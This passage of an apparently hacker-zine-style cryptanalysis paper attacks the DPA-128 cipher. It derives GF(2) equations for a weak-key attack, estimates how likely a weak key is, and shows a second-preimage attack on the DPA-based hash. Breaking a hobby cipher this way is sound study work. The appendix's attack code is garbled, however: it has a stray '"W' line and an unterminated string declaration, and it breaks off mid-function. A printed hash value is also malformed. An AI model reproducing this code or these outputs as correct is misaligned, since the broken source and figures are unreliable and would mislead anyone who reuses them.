    c(i+1) = w(i).k(i) xor w(i).c(i) xor k(i).c(i)
    with c(0) = 0
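
The recursion can be checked by brute force. The function below (add_gf2 is a name we made up) rebuilds the addition modulo 256 bit by bit, using nothing but xor and and, i.e. the two laws of GF(2):

```c
/* Add two bytes modulo 256 using only GF(2) operations on their bits. */
unsigned char add_gf2(unsigned char w, unsigned char k)
{
    unsigned char sum = 0;
    unsigned int c = 0;                     /* c(0) = 0 */
    int i;

    for (i = 0; i < 8; ++i) {
        unsigned int wi = (w >> i) & 1u;
        unsigned int ki = (k >> i) & 1u;

        sum |= (unsigned char)((wi ^ ki ^ c) << i);  /* w(i) xor k(i) xor c(i) */
        c = (wi & ki) ^ (wi & c) ^ (ki & c);         /* c(i+1)                 */
    }
    return sum;
}
```

Comparing add_gf2(w, k) with (w + k) % 256 over the 65536 possible couples shows no mismatch. The carry out of bit 7 is simply dropped, which is the reduction modulo 256.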


Using this notation, it would thus be possible to determine a set of
relations over GF(2) between input/output bits which the attacker controls
using a known plaintext attack and the subkey bits (which the attacker
tries to guess).


However, recovering the subkey bits won't be that easy. Indeed, to determine
them, we need to get rid of the carries, replacing them by multivariate
polynomials where unknowns are monomials of huge order.


Remark 1: Because of the recursivity of the carry, the order of monomials
grows as the number of input bits per round and the number of
rounds increase.


Remark 2: Obviously we can not use intermediary input/output bits in our
equations. This is because unlike the subkey bits, they depend on the
input.


We are thus able to express the cryptosystem as a multivariate polynomial
system over GF(2). Solving such a system is NP-hard. There exist methods
for systems of reasonable order like Groebner bases and relinearization
techniques but the order of this system seems to be far too huge.


However for a particular set of keys, the so-called weak keys, it is 
possible to determine the subkeys quite easily getting rid of the complexity 
introduced by the carry. 


--[ 7 - Exploiting weak keys 


Let’s first define a weak key. According to wikipedia: 


"In cryptography, a weak key is a key which when used with a specific 
cipher, makes the cipher behave in some undesirable way. Weak keys usually 
represent a very small fraction of the overall keyspace, which usually 
means that if one generates a random key to encrypt a message weak keys are
very unlikely to give rise to a security problem. Nevertheless, it is
considered desirable for a cipher to have no weak keys." 


Actually we identified a particular subset |W of |K allowing us to deal 
quite easily with the carry problem. A key "k" is part of |W if and only if 
for each round the shift parameter is a multiple of 8. The reader should 
understand why later. 


We will first present the attack on a reduced version of DPA for simplicity 
purpose and generalize it later to the full version. 


--[ 7.1 - Playing with a toy cipher 


Our toy cipher is a 2 rounds DPA. Moreover, the cipher takes as input 4*8 
bits instead of 16*8 = 128 bits which means that DPA_BLOCK_SIZE = 4. We 
also make a little modification in bytechain() operation. Let’s remember 
the bytechain() function: 


void rbytechain(unsigned char *block)
{
    int i;

    for (i = 0; i < DPA_BLOCK_SIZE; ++i)
        block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];
    return;
}

Since block is both input AND output of the function then we have for
DPA_BLOCK_SIZE = 4:

    V(0) = U(0) xor U(1)
    V(1) = U(1) xor U(2)
    V(2) = U(2) xor U(3)
    V(3) = U(3) xor V(0) = U(0) xor U(1) xor U(3)

Where V(x) is the x'th byte element.

Thus with our modification:

    V(0) = U(0) xor U(1)
    V(1) = U(1) xor U(2)
    V(2) = U(2) xor U(3)
    V(3) = U(3) xor U(0)
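
The in-place behaviour is easy to observe on a 4 bytes block. In the sketch below, rbytechain() follows the code quoted above with the block size hard-coded to 4 (the BLOCK constant is ours), and lbytechain() is a hypothetical reconstruction of the inverse, obtained by replaying the same xors in reverse order; the real lbytechain() from the DPA sources is not shown in this paper.

```c
#define BLOCK 4   /* toy value used instead of DPA_BLOCK_SIZE */

/* In-place chaining: the last byte is xored with the NEW block[0]. */
void rbytechain(unsigned char *block)
{
    int i;

    for (i = 0; i < BLOCK; ++i)
        block[i] ^= block[(i + 1) % BLOCK];
}

/* Hypothetical inverse: undo the xors starting from the last one. */
void lbytechain(unsigned char *block)
{
    int i;

    for (i = BLOCK - 1; i >= 0; --i)
        block[i] ^= block[(i + 1) % BLOCK];
}
```

Starting from U = {0x12, 0x34, 0x56, 0x78}, rbytechain() yields V(3) = 0x12 xor 0x34 xor 0x78 rather than 0x78 xor 0x12, and lbytechain() brings back U. No key material is involved anywhere, as noticed in 4.2.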


Regarding the mathematical notation (pay your ascii !@#):

    - U,V,W,Y vector notation of section 5 remains.
    - Xj(i) is the i'th bit of vector Xj where j is j'th round.
    - U0 vector is equivalent to P where P is a plaintext.
    - m is the shift of round 0
    - n is the shift of round 1
    - xor will be written '+' since calculation is done in GF(2)
    - All calculation of subscript will be done in the ring ZZ_32

How did we choose |W? Using algebra in GF(2) implies to deal with the carry.
However, if k is a weak key (part of |W), then we can manage the calculation
so that it's not painful anymore.


Let i be the lowest bit of any input byte. Therefore for each i part of the
set {0,8,16,24} we have:

    u0(i)     = p(i)
    v0(i)     = p(i) + p(i+8)
    w0(i+m)   = v0(i)
    y0(i)     = w0(i) + k0(i) + C0(i)
    y0(i+m)   = w0(i+m) + k0(i+m) + C0(i+m)
    y0(i+m)   = p(i) + p(i+8) + k0(i+m) + C0(i+m)     /* carry(0) = 0 */
    y0(i+m)   = p(i) + p(i+8) + k0(i+m)

    u1(i)     = y0(i)
    v1(i)     = y0(i) + y0(i+8)
    w1(i+n)   = v1(i)
    y1(i)     = w1(i) + k1(i) + C1(i)
    y1(i+n)   = w1(i+n) + k1(i+n) + C1(i+n)
    y1(i+n)   = y0(i) + y0(i+8) + k1(i+n) + C1(i+n)
    y1(i+n+m) = y0(i+m) + y0(i+m+8) + k1(i+n+m) + C1(i+n+m)
                                                      /* carry(0) = 0 */
    y1(i+n+m) = p(i) + p(i+8) + k0(i+m) + p(i+8) + p(i+16)
              + k0(i+m+8) + k1(i+n+m)
    y1(i+n+m) = p(i) + k0(i+m) + p(i+16) + k0(i+m+8) + k1(i+n+m)

As stated before, i is part of the set {0,8,16,24} so we can write:

    y1(n+m)    = p(0)  + k0(m)    + p(16) + k0(m+8)  + k1(n+m)
    y1(8+n+m)  = p(8)  + k0(8+m)  + p(24) + k0(m+16) + k1(8+n+m)
    y1(16+n+m) = p(16) + k0(16+m) + p(0)  + k0(m+24) + k1(16+n+m)
    y1(24+n+m) = p(24) + k0(24+m) + p(8)  + k0(m)    + k1(24+n+m)

In the case of a known plaintext attack, the attacker has the knowledge of
a set of couples (P,Y1). Therefore considering the previous system, the
lowest bits of the K0 and K1 vectors are the unknowns. Here we have a system
which is clearly underdefined since it is composed of 4 equations and
4*2 unknowns. It will give us the relations between each lowest bit of Y
and the lowest bits of K0 and K1.
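
The four relations above can be checked experimentally. The following sketch models the toy cipher under explicit assumptions of ours: 4 bytes blocks, the modified bytechain, shifts that are multiples of 8 (so the rotation moves whole bytes, here by a and b positions for rounds 0 and 1), and a round key byte K that already merges the subkey byte and the shift. The function names and the rotation direction are arbitrary choices; the relation only needs them to be used consistently.

```c
#include <string.h>

#define TOY_BLOCK 4

/* One toy round: modified bytechain, rotation by `bytes` whole bytes,
 * then key addition modulo 256. */
void toy_round(unsigned char *blk, const unsigned char *key,
               unsigned int bytes)
{
    unsigned char v[TOY_BLOCK], w[TOY_BLOCK];
    unsigned int j;

    for (j = 0; j < TOY_BLOCK; ++j)
        v[j] = blk[j] ^ blk[(j + 1) % TOY_BLOCK];    /* V = bytechain(U) */
    for (j = 0; j < TOY_BLOCK; ++j)
        w[(j + bytes) % TOY_BLOCK] = v[j];           /* w(i+m) = v(i)    */
    for (j = 0; j < TOY_BLOCK; ++j)
        blk[j] = (unsigned char)(w[j] + key[j]);     /* Y = W + K        */
}

/* Returns 1 when the lowest-bit relation holds for input byte j:
 * y1(i+n+m) = p(i) + k0(i+m) + p(i+16) + k0(i+m+8) + k1(i+n+m) */
int lowbit_relation_holds(const unsigned char *p, const unsigned char *k0,
                          const unsigned char *k1, unsigned int a,
                          unsigned int b, unsigned int j)
{
    unsigned char y[TOY_BLOCK];
    unsigned int lhs, rhs;

    memcpy(y, p, TOY_BLOCK);
    toy_round(y, k0, a);
    toy_round(y, k1, b);

    lhs = y[(j + a + b) % TOY_BLOCK] & 1u;
    rhs = (p[j] ^ k0[(j + a) % TOY_BLOCK]
           ^ p[(j + 2) % TOY_BLOCK] ^ k0[(j + a + 1) % TOY_BLOCK]
           ^ k1[(j + a + b) % TOY_BLOCK]) & 1u;
    return lhs == rhs;
}
```

For any plaintext, any pair of round keys and any byte rotations a and b, the function returns 1: the carry never reaches the lowest bit of a byte, so this bit behaves linearly.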


Remark 1: n,m are unknown. A trivial approach is to determine them, which
costs 2^4 guesses per round. However, applying the same idea to the full 16
rounds would cost us (2^4)^16 = 2^64! Such a complexity is a pain in the ass
even nowadays :-)

A much better approach is to guess (n+m) as it costs 2^4 whatever the
number of rounds. It gives us the opportunity to write relations between
some input and output bits. We do not need to know exactly m and n. The
knowledge of the intermediate variables k0(x+m) and k1(y+n+m) is
sufficient.

Remark 2: An underdefined system brings several solutions. We are
thus able to choose arbitrarily 4 variables, fixing them with values of
our choice. Of course we have to choose so that we are able to solve the
system with the remaining variables. For example taking k0(m), k0(m+8) and
k1(n+m) together is not fine because of the first equation. However, fixing
all the k0(x+m) may be a good idea as it automatically gives the
corresponding k1(y+n+m).


Now let's go further. Let i be part of the set {1,9,17,25}. We can write:

    u0(i)     = p(i)
    v0(i)     = p(i) + p(i+8)
    w0(i+m)   = v0(i)
    y0(i)     = w0(i) + k0(i) + w0(i-1)*k0(i-1)
    y0(i+m)   = w0(i+m) + k0(i+m) + w0(i+m-1)*k0(i+m-1)
    y0(i+m)   = p(i) + p(i+8) + k0(i+m) + w0(i+m-1)*k0(i+m-1)
    y0(i+m)   = p(i) + p(i+8) + k0(i+m) + (p(i-1) + p(i-1+8))*k0(i+m-1)

    u1(i)     = y0(i)
    v1(i)     = y0(i) + y0(i+8)
    w1(i+n)   = v1(i)
    y1(i)     = w1(i) + k1(i) + C1(i)
    y1(i)     = w1(i) + k1(i) + w1(i-1)*k1(i-1)
    y1(i+n)   = w1(i+n) + k1(i+n) + w1(i-1+n)*k1(i-1+n)
    y1(i+n)   = y0(i) + y0(i+8) + k1(i+n)
              + (y0(i-1) + y0(i+8-1)) * k1(i-1+n)
    y1(i+n+m) = y0(i+m) + y0(i+m+8) + k1(i+m+n)
              + (y0(i+m-1) + y0(i+m+8-1)) * k1(i+m+n-1)
    y1(i+n+m) = p(i) + p(i+8) + k0(i+m) + (p(i-1) + p(i-1+8)) * k0(i+m-1)
              + p(i+8) + p(i+16) + k0(i+m+8)
              + (p(i+8-1) + p(i-1+16)) * k0(i+m-1+8)
              + k1(i+n+m)
              + k1(i+m+n-1) * [p(i-1) + p(i+8-1) + k0(i+m-1)]
              + k1(i+m+n-1) * [p(i-1+8) + p(i+16-1) + k0(i+m-1+8)]
    y1(i+n+m) = p(i) + k0(i+m) + (p(i-1) + p(i-1+8)) * k0(i+m-1)
              + p(i+16) + k0(i+m+8) + (p(i+8-1) + p(i-1+16)) * k0(i+m-1+8)
              + k1(i+n+m)
              + k1(i+m+n-1) * [p(i-1) + k0(i+m-1)]
              + k1(i+m+n-1) * [p(i-1+16) + k0(i+m-1+8)]

Thanks to the previous system resolution, we have the knowledge of
k0(i+m-1+x) and k1(i+m+n-1+y) variables. Therefore, we can reduce the
previous equation to:

    A(i) = k0(i+m) + k0(i+m+8) + k1(i+n+m)      (alpha)

where A(i) is a known value for the attacker.


Remark 1: This equation represents the same system as found in case of i
being the lowest bit! Therefore all previous remarks remain.

Remark 2: If we hadn't had the knowledge of the k0(i+m-1+x) and
k1(i+m+n-1+y) bits then the number of variables would have grown seriously.
Moreover we would have had to deal with some degree 2 monomials :-/.

We can thus conjecture that the equation alpha will remain true for each i
part of {a,a+8,a+16,a+24} where 0 <= a < 8.


--[ 7.2 - Generalization and expected complexity 


Let's deal with the real bytechain() function now.
As stated before and for DPA_BLOCK_SIZE = 4 we have:

    V(0) = U(0) xor U(1)
    V(1) = U(1) xor U(2)
    V(2) = U(2) xor U(3)
    V(3) = U(0) xor U(1) xor U(3)

This is clearly troublesome as the last byte V(3) is NOT calculated like
V(0), V(1) and V(2). Because of the rotations involved, we won't be able to
know when the bit manipulated is part of V(3) or not.


Therefore, we have to use a general formula:

    V(i) = U(i) + U(i+1) + a(i).U(i+2)
    where a(i) = 1 for i = 24 to 31 and 0 otherwise

For i part of {0,8,16,24} we have:

    u0(i)     = p(i)
    v0(i)     = p(i) + p(i+8) + a0(i).p(i+16)
    w0(i+m)   = v0(i)
    y0(i)     = w0(i) + k0(i) + C0(i)
    y0(i+m)   = w0(i+m) + k0(i+m) + C0(i+m)
    y0(i+m)   = p(i) + p(i+8) + a0(i).p(i+16) + k0(i+m) + C0(i+m)
                                                      /* carry(0) = 0 */
    y0(i+m)   = p(i) + p(i+8) + a0(i).p(i+16) + k0(i+m)

    u1(i)     = y0(i)
    v1(i)     = y0(i) + y0(i+8) + a1(i).y0(i+16)
    w1(i+n)   = v1(i)
    y1(i)     = w1(i) + k1(i) + C1(i)
    y1(i+n)   = w1(i+n) + k1(i+n) + C1(i+n)
    y1(i+n)   = y0(i) + y0(i+8) + a1(i).y0(i+16) + k1(i+n) + C1(i+n)
    y1(i+n+m) = y0(i+m) + y0(i+m+8) + a1(i+m).y0(i+m+16) + k1(i+n+m)
    y1(i+n+m) = p(i) + p(i+8) + a0(i).p(i+16) + k0(i+m)
              + p(i+8) + p(i+16) + a0(i).p(i+24) + k0(i+m+8)
              + a1(i+m).[p(i+16) + p(i+24) + a0(i).p(i) + k0(i+m+16)]
              + k1(i+n+m)
    y1(i+n+m) = p(i) + a0(i).p(i+16) + k0(i+m)
              + p(i+16) + a0(i).p(i+24) + k0(i+m+8)
              + a1(i+m).[p(i+16) + p(i+24) + a0(i).p(i) + k0(i+m+16)]
              + k1(i+n+m)


a0(i) is not a problem since we know it. This is coherent with the fact
that the first operation of the cipher is rbytechain() which is invertible
for the attacker. However, the problem lies in the a1(i+m) variables.


Guessing a1(i+m) is out of the question as it would cost us a complexity of
(2^4)^15 = 2^60 for the 16 rounds! The solution is to consider a1(i+m) as
another set of 4 variables. We can also add the following equation to our
system:

    a1(m) + a1(m+8) + a1(m+16) + a1(m+24) = 1

This equation will remain true for other bits.


So what is the global complexity? Obviously with DPA_BLOCK_SIZE = 16 each
system is composed of 16+1 equations of 16+1 variables (we fixed the
others). Therefore, the complexity of the resolution is:

    log(17^3) / log(2) =~ 12.26

We will solve 8 systems since there are 8 bits per byte. Thus the global
complexity is around (2^13)*8 = 2^16.

Remark: We didn't take into account the calculation of the equations as they
are assumed to be determined using a formal calculation program such as
pari-gp or magma.


--[ 7.3 - Cardinality of |W 


What is the probability of choosing a weak key? We have seen that our weak
key criterion is that for each round, the rotation parameter needs to be
a multiple of 8. Obviously, it happens with 16 / 128 = 1/8 theoretical
probability per round. Since we consider subkeys being random, the
generations of rotation parameters are independent which means that the
overall probability is (1/8)^16 = 1/2^48.


Although a probability of 1/2^48 means a (huge) set of 2^80 weak keys, in
real life there are very few chances to choose one of them. In fact,
you probably have much more chances to win the lottery ;) However, two facts
must be noticed:

    - We presented one set of weak keys but there may be some more!
    - We illustrated another weakness in the conception of DPA-128


Remark: A probability of 1/8 per round is completely theoretic as it
supposes a uniform distribution of hash32() output. Considering the extreme
simplicity of the hash32() function, it wouldn't be too surprising for it
to be different in practice. Therefore we made a short test to compute the
real probability (Annexe B).
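
Before looking at the measurement, the theoretical 1/8 can be recovered by simple enumeration. The sketch below is not the Annexe B program: it only assumes, following remark b) of section 4.2, that the rotation amount is given by the 7 low bits of the shift byte, and counts the byte values leading to a multiple of 8.

```c
/* Count the shift bytes whose 7 low bits form a multiple of 8. */
int count_weak_shifts(void)
{
    int s, n = 0;

    for (s = 0; s < 256; ++s)
        if (((s & 0x7f) % 8) == 0)   /* rotation amount is a multiple of 8 */
            ++n;
    return n;
}
```

The function returns 32, that is 32/256 = 1/8 per round, or 3 bits per round and 48 bits over the 16 rounds under the uniformity hypothesis.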


$ gcc test.hash32.c checksum128.o hash32.o -o test.hash32 -O3
-fomit-frame-pointer
$ time ./test.hash32
[+] Probability is 0.125204

real    0m14.654s
user    0m14.649s
sys     0m0.000s
$ gp -q
? (1/0.125204) ^ 16
274226068900783.2739747241633
? log(274226068900783.2739747241633) / log(2)
47.96235905375676878381741198
?

This result tells us clearly that the probability of shift being a multiple
of 8 is around 1/2^2.99 ~ 1/8 per round which is assimilated to the
theoretical one since the difference is too small to be significant. In
order to improve the measure, we used checksum128() as an input of
hash32(). Furthermore, we also tried to test hash32() without the "*k &&"
bug mentioned earlier. Both tests gave similar results which means that the
bug is not important in practice and that checksum128() doesn't seem to be
particularly skewed. This is a good point for DPA! :-D


--[ 8 - Breaking DPA-based unkeyed hash function 


In his paper, Veins also explains how a hash function can be built out of 
DPA. We will analyze the proposed scheme and will show how to completely 
break it. 


--[ 8.1 - Introduction to hash functions 


Quoting once again the excellent HAC [MenVan]:
"A hash function is a function h which has, as a minimum, the following two
properties:

1. compression - h maps an input x of arbitrary finite bitlength, to an
output h(x) of fixed bitlength n.
2. ease of computation - given h and an input x, h(x) is easy to compute."

In cryptography there are essentially two families of hash functions:


1. The MAC (Message Authentication Codes). They are keyed ones and provide
both authentication (of source) and integrity of messages.

2. The MDC (Modification Detection Code), sometimes referred to as MIC. They
are unkeyed and only provide integrity. We will focus on this kind of
functions. When designing his hash function, the cryptographer generally
wants it to satisfy the three properties:

    - preimage resistance. For any y, it should not be possible (that is to
      say computationally infeasible) to find an x such as h(x) = y. Such a
      property implies that the function has to be non invertible.
    - 2nd preimage resistance. For any x, it should not be possible to find
      an x' such as h(x) = h(x') when x and x' are different.
    - collision resistance. It should not be possible to find an x and an x'
      (with x different of x') such that h(x) = h(x').


Remark 1: Properties 1 and 2 are essential when dealing with binary
integrity.


Remark 2: The published attacks on MD5 and SHA-0/SHA-1 were dealing with the
third property. While it is true that finding collisions on a hash function
is enough for the crypto community to consider it insecure (and sometimes
leads to a new standard [NIST2007]), for most usages it still remains
sufficient.


There are many ways to design an MDC function. Some functions are based on
the MD4 function such as MD5 or SHA* functions which heavily rely on boolean
algebra and operations in GF(2^32), some are based on NP problems such as
RSA and finally some others are block cipher based.

The third category is particularly interesting since the security of the
hash function can be reduced to the one of the underlying block cipher.
This is of course only true with a good design.


--[ 8.2 - DPAsum() algorithm 


The DPA-based hash function lies in the functions DPA_sum() and
DPA_sum_write_to_file() which can be found respectively in file sum.c and
data.c.


Let's detail them a little bit using pseudo code:


Let M be the message to hash, let M(i) be the i'th 128b block message.

Let N = DPA_BLOCK_SIZE * i + j be the size in bytes of the message where i
and j are integers such as i = N / DPA_BLOCK_SIZE and 0 <= j < 16.

Let C be an array of 128 bits elements where intermediary results of hash
calculation are stored. The last element of this array is the hash of the
message.


func DPA_sum(K0,M,C):

    K0 = key("deadbeef");
    IV = "0123456789abcdef";

    C(0) = E( IV , K0);
    C(1) = E( IV xor M(0) , K0);

    for a = 1 to i-1:
        C(a+1) = E( C(a) xor M(a) , K0);

    if j == 0:
        C(i+1) = E( C(i) xor 000...000 , K0)
    else
        C(i+1) = E( C(i) xor PAD( M(i) ) , K0);
        C(i+2) = E( C(i+1) xor 000...00S , K0)    /* S = 16-j */
    return;


func DPA_sum_write_to_file(C, file):

    write(file, C(last_element));
    return;


--[ 8.3 - Weaknesses in the design/implementation


We noticed several implementation mistakes in the code:


a) Using the algorithm of hash calculation, every element of array C is
defined recursively; however C(0) is never used in calculation. This doesn't
impact security in itself but is somewhat strange and could let us think
that the function was not designed before being programmed.


b) When the size of M is not a multiple of DPA_BLOCK_SIZE (j is not equal
to 0) then the algorithm calculates the last element using a xor mask where
the last byte gives information on the size of the original message.
However, what is included in the padding is not the size of the message in
itself but rather the size of padding.


If we take the example of the well known Merkle-Damgard construction on
which the MD{4,5} and SHA-{0,1} functions are based, then the length of the
message was initially appended in order to prevent collision attacks for
messages of different sizes. Therefore in the DPA_sum() case, appending j
to the message is not sufficient as it would be possible to find collisions
for messages of size (DPA_BLOCK_SIZE*a + j) and (DPA_BLOCK_SIZE*b + j) where
obviously a and b are different.


Remark: The fact that the IV and the master key are initially fixed is not 
a problem in itself since we are dealing with MDC here. 


--[ 8.4 - A (2nd) preimage attack 


Because of the hash function construction properties, being given a
message X, it is trivial to create a message X' such as h(X) = h(X'). This
is called building a 2nd preimage attack.


We built a quick & dirty program to illustrate it (Annexe C). It takes a
32 bytes message as input and produces another 32 bytes one with the same
hash:


$ cat to.hack | hexdump -C
00000000  58 41 4c 4b 58 43 4c 4b  53 44 4c 46 4b 53 44 46  |XALKXCLKSDLFKSDF|
00000010  58 4c 4b 58 43 4c 4b 53  44 4c 46 4b 53 44 46 0a  |XLKXCLKSDLFKSDF.|
00000020
$ ./dpa -s to.hack
6327b5becaab3e5c61a00430eE375b734
$ gcc break_hash.c *.o -o break_hash -I ./include
$ ./break_hash to.hack > hacked
$ ./dpa -s hacked
6327b5becaab3e5c61a00430eE375b734
$ cat hacked | hexdump -C

00000000  43 4f 4d 50 4c 45 54 45  4c 59 42 52 4f 4b 45 4e  |COMPLETELYBROKEN|
00000010  3e bf de 93 d7 17 7e 1d  2a c7 c6 70 66 bb eb a3  |>.....~.*..pf...|
00000020

Nice isn't it ? :-) We were able to write arbitrary data in the first 16
bytes and then to calculate the next 16 bytes so that the 'hacked' file had
the exact same hash. But how did we do such an evil thing?

Assuming the size of both messages is 32 bytes then:

    h(Mi) = E(E(Mi(0) xor IV,K0) xor Mi(1),K0)

Therefore, it is obvious that:

    h(M1) = h(M2) is equivalent to
    E(E(M1(0) xor IV,K0) xor M1(1),K0) = E(E(M2(0) xor IV,K0) xor M2(1),K0)

Which can be reduced to:

    E(M1(0) xor IV,K0) xor M1(1) = E(M2(0) xor IV,K0) xor M2(1)

Which therefore gives us:

    M2(1) = E(M2(0) xor IV,K0) xor E(M1(0) xor IV,K0) xor M1(1)     [A]


Since M1,IV,K0 are known parameters then for a chosen M2(0), [A] gives us
M2(1) so that h(M1) = h(M2).
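
Equation [A] does not depend on the block cipher at all, which the following sketch tries to show. It is not Annexe C: toy_E() is a made-up 32 bits keyed permutation standing in for E(.,K0), and TOY_IV, TOY_KEY and the function names are hypothetical values chosen for the illustration.

```c
#include <stdint.h>

#define TOY_IV  0x01234567u     /* hypothetical fixed IV  */
#define TOY_KEY 0xdeadbeefu     /* hypothetical fixed key */

static uint32_t rotl32(uint32_t x, unsigned int r)
{
    return (x << r) | (x >> (32 - r));
}

/* Stand-in for E(.,K0): any fixed, publicly computable permutation. */
uint32_t toy_E(uint32_t x)
{
    int r;

    for (r = 0; r < 4; ++r)
        x = rotl32(x + TOY_KEY, 7) ^ (TOY_KEY >> r);
    return x;
}

/* h(M) = E(E(M(0) xor IV) xor M(1)) for a two blocks message */
uint32_t toy_hash(uint32_t m0, uint32_t m1)
{
    return toy_E(toy_E(m0 ^ TOY_IV) ^ m1);
}

/* Equation [A]: second block of M2 for a freely chosen first block. */
uint32_t second_block(uint32_t m1_0, uint32_t m1_1, uint32_t m2_0)
{
    return toy_E(m2_0 ^ TOY_IV) ^ toy_E(m1_0 ^ TOY_IV) ^ m1_1;
}
```

Choosing any first block m2_0 and computing the second one with second_block() gives a message with the same toy_hash() value as (m1_0, m1_1). The attacker only needs to evaluate E, which is always possible here since the key and the IV are fixed and public.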


Remark 1: Actually such a result can be easily generalized to n bytes
messages. In particular, the attacker can put anything in his message and
"correct it" using the last blocks (if n >= 32).


Remark 2: Of course building a preimage attack is also very easy. We
mentioned previously that we had for a 32 bytes message:

    h(Mi) = E(E(Mi(0) xor IV,K0) xor Mi(1),K0)

Therefore, Mi(1) = E^-1(h(Mi),K0) xor E(Mi(0) xor IV,K0)     [B]


The [B] equation tells us how to generate Mi(1) so that we have h(Mi) in
output. It doesn't seem to be really a one way hash function, does it ? ;-)

Building a hash function out of a block cipher is a well known problem in
cryptography which doesn't only involve the security of the underlying
block cipher. One should rely on one of the many well known and heavily
analyzed algorithms for this purpose instead of trying to design one.


--[ 9 - Conclusion


We highlighted some weaknesses of the cipher and were also able to
totally break the proposed hash function built out of DPA. In his paper,
Veins implicitly set the bases of a discussion to which we wish to deliver
our opinion. We claim that it is necessary to understand cryptology
properly. The goal of this paper wasn't to illustrate anything else but
that fact. Being hacker or not, paranoid or simply careful, the rule is the
same for everybody in this domain: nothing should be done without reflection.


--[ 10 - Greetings


TF crypto dudes for friendly and smart discussions and specially X for
giving me a lot of hints. I learned a lot from you guys :-)

K40rl friends for years of fun ;-) Hi all :)

Finally but not least my GF and her kindness which is her prime
characteristic :> (However if she finds out the joke in the last sentence
I may die :|)


--[ Annexe A - Breaking the linearised version

8< 8< 8< 8< 8< 8< 

/* Crappy C/C++ source. I'm in a hurry for the paper redaction so don't
 * blame me toooooo much please ! :> */

#include <iostream>
#include <fstream>
#include <cstdio>
#include <cstring>
#include <ctime>
#include <openssl/rc4.h>
#include <NTL/ZZ.h>
#include <NTL/ZZ_p.h>
#include <NTL/mat_GF2.h>
#include <NTL/vec_GF2.h>
#include <NTL/GF2E.h>
#include <NTL/GF2XFactoring.h>
#include "dpa.h"

using namespace NTL;

/* Linearized key mixing: the addition of S_E() is replaced by xor */
void
S_E2 (unsigned char *key, unsigned char *block, unsigned int s)
{
  int i;

  for (i = 0; i < DPA_BLOCK_SIZE; ++i)
    {
      block[i] ^= (key[i] ^ s) % 256;
    }
  return;
}

/* One round of the linearized cipher */
void
E2 (unsigned char *key, unsigned char *block, unsigned int shift)
{
  rbytechain (block);
  rbitshift (block, shift);
  S_E2 (key, block, shift);
}

/* 16 rounds of E2() applied to a single block */
void
DPA_ecb_encrypt (DPA_KEY * key, unsigned char * src, unsigned char * dst)
{
  int j;

  memcpy (dst, src, DPA_BLOCK_SIZE);
  for (j = 0; j < 16; j++)
    E2 (key->subkey[j].key, dst, key->subkey[j].shift);
  return;
}

/* Hexadecimal dump of a 16 bytes block */
void affichage (unsigned char *chaine)
{
  int i;

  for (i = 0; i < 16; i++)
    printf ("%.2x", (unsigned char) chaine[i]);
  printf ("\n");
}


"W 


unsigned char test_p[] "ABCD_ABCD_12 
unsigned char test_c1[16];
unsigned char test_c2[16];
DPA_KEY key;
RC4_KEY rc4_key;

struct vect {
  unsigned char plaintxt[16];
  unsigned char ciphertxt[16];
};

struct vect toto[128];
unsigned char src1[16], src2[16];
unsigned char block1[16], block2[16];

int main()
{
  /* Key */
  unsigned char str_key[] = " _323DFF?FF4cxsdA@&";
  DPA_set_key (&key, str_key, DPA_KEY_SIZE);

  /* Init our RANDOM generator */
  char time_key[16];
  snprintf(time_key, 16, "%d%d", (int)time(NULL), (int)time(NULL));
  RC4_set_key (&rc4_key, strlen(time_key), (unsigned char *)time_key);

  /* Let's crypt 16 plaintexts */
  printf ("[+] Generating the plaintexts / ciphertexts\n");

  int i=0;
  int a=0;

  for (i=0; i<128; i++)
    {
      RC4(&rc4_key, 16, src1, src1);    // Input is nearly random :)
      DPA_ecb_encrypt (&key, src1, block1);
      RC4(&rc4_key, 16, src2, src2);    // Input is nearly random :)
      DPA_ecb_encrypt (&key, src2, block2);

      /* Store the input difference and the output difference */
      for (a=0; a<16; a++)
        {
          toto[i].plaintxt[a] = src1[a] ^ src2[a];
          toto[i].ciphertxt[a] = block1[a] ^ block2[a];
        }
    }

  /* Now the NTL stuff */
  printf("[+] NTL stuff !\n");

  vec_GF2 m2(INIT_SIZE,128);
  vec_GF2 B(INIT_SIZE,128);
  mat_GF2 M(INIT_SIZE,128,128);
  mat_GF2 Mf(INIT_SIZE,128,128);        // The final matrix !
  clear(Mf);
  clear(M);
  clear(m2);
  clear(B);

  /* Lets fill M correctly */
  int k=0;
  int j=0;
  for (k=0; k<128; k++)         // each row !
    {
      for (i=0; i<16; i++)
        {
          for (j=0; j<8; j++)
            M.put(i*8+j, k, (toto[k].plaintxt[i] >> j) & 0x1);
        }
    }

  GF2 d;
  determinant(d,M);

  /* if !det then it means the vectors were linearly linked :'( */
  if (IsZero(d))
    {
      std::cout << "det(M) = 0\n";
      exit(1);
    }

  /* Let's solve the 128 systems :) */
  printf("[+] Calculation of Mf\n");
  for (k=0; k<16; k++)
    {
      for (j=0; j<8; j++)
        {
          /* Bit j of ciphertext byte k, for each of the 128 pairs */
          for (i=0; i<128; i++)
            B.put(i, (toto[i].ciphertxt[k] >> j) & 0x1);

          solve(d, m2, M, B);

#ifdef __debug__
          std::cout << "m2 is " << m2 << "\n";
#endif

          int b=0;
          for (; b<128; b++)
            Mf.put(k*8+j, b, m2.get(b));
        }
    }

#ifdef __debug__
  std::cout << "Mf = " << Mf << "\n";
#endif

  /* Now that we have Mf, let's make a test ;) */
  printf("[+] Let's make a test !\n");
  bzero(test_c1, 16);
  bzero(test_c2, 16);

  char DELTA_X[16];
  char DELTA_Y[16];
  bzero(DELTA_X, 16);
  bzero(DELTA_Y, 16);

  DPA_ecb_encrypt (&key, test_p, test_c1);

  // DELTA_X !
  unsigned char U0[] = "ABCDEFGHABCDEFG1";
  unsigned char Y0[16];
  DPA_ecb_encrypt (&key, U0, Y0);

  for (i=0; i<16; i++)
    {
      DELTA_X[i] = test_p[i] ^ U0[i];
    }

  // DELTA_Y !
  vec_GF2 X(INIT_SIZE,128);
  vec_GF2 Y(INIT_SIZE,128);
  clear(X);
  clear(Y);

  for (k=0; k<16; k++)
    {
      for (j=0; j<8; j++)
        {
          X.put(k*8+j, (DELTA_X[k] >> j) & 0x1);
        }
    }

  Y = Mf * X;

#ifdef __debug__
  std::cout << "X = " << X << "\n";
  std::cout << "Y = " << Y << "\n";
#endif

  GF2 z;
  for (k=0; k<16; k++)
    {
      for (j=0; j<8; j++)
        {
          z = Y.get(k*8+j);
          if (IsOne(z))
            DELTA_Y[k] |= (1 << j);
        }
    }

  // test_c2 !
  for (i=0; i<16; i++)
    test_c2[i] = DELTA_Y[i] ^ Y0[i];

